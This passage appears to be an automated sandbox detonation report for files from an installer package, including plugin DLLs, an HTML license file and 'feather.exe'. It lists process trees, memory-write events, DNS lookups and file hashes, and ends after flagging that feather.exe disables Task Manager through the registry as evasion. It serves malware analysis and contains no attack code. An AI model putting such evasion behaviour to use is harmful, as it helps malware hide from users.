N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 220

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

90s

Max time network

94s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1928 wrote to memory of 4276 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1928 wrote to memory of 4276 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1928 wrote to memory of 4276 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4276 -ip 4276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 9.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

145s

Max time network

157s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

Signatures

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1952 wrote to memory of 4860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 4864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1952 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff858fa46f8,0x7ff858fa4708,0x7ff858fa4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1440 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

\??\pipe\LOCAL\crashpad_1952_HCZBFPHWHOKWPETG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a8e767fd33edd97d306efb6905f93252
SHA1 a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256 c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA512 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8567316010903a6a90b08458e30b6f82
SHA1 daf7d1d6c33f11198c2f55ba449d261c42c2a7da
SHA256 15e599233344ddd6f659ce83fb12ea673b2df6c9df50c4a5f05c7c1c3f85de49
SHA512 2a397ec18e7109f25e49af778cf1ba3d3114eedae1b39b9bd362730ead6ea26a7ed2832cffbf3bf0fee697e57388baabc07706f1c1d2f381e38e1bf2b961b465

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7198bdb3f2519408508c6f6bf6578450
SHA1 a58db09182f85c8ae3302050899225f0f8d377b2
SHA256 f740d32ecf9ab22961357e5ffac17f9a68aa17cd70511cf00b4c4ff644940173
SHA512 624864b99e6e5ac6a23f74c549efb606655cefd38e15d037757df2de682157c92654901afd07bf10c8a0a2dc7eeef92124f4ae57ec4d69820f1a8d71aea2691e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 af6c6a59e4c1015a1fb53baf63c675e2
SHA1 1f0cc03c5ec93676774097faabb1250b3265524a
SHA256 84ba92ab71200b1c85cdd263ab99bdd20444110ac57bdf40a6bb17eb12bb7b47
SHA512 fb45a2ee791888b7d2c2a065727c91e26c70749cf9b96d350c9749cf5d08486c2e2358b92c969ed6f1546e9af68b09c984f7593ccefe6e088d573f137a4dc1ca

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

121s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 18:10

Platform

win10v2004-20240426-en

Max time kernel

843s

Max time network

454s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
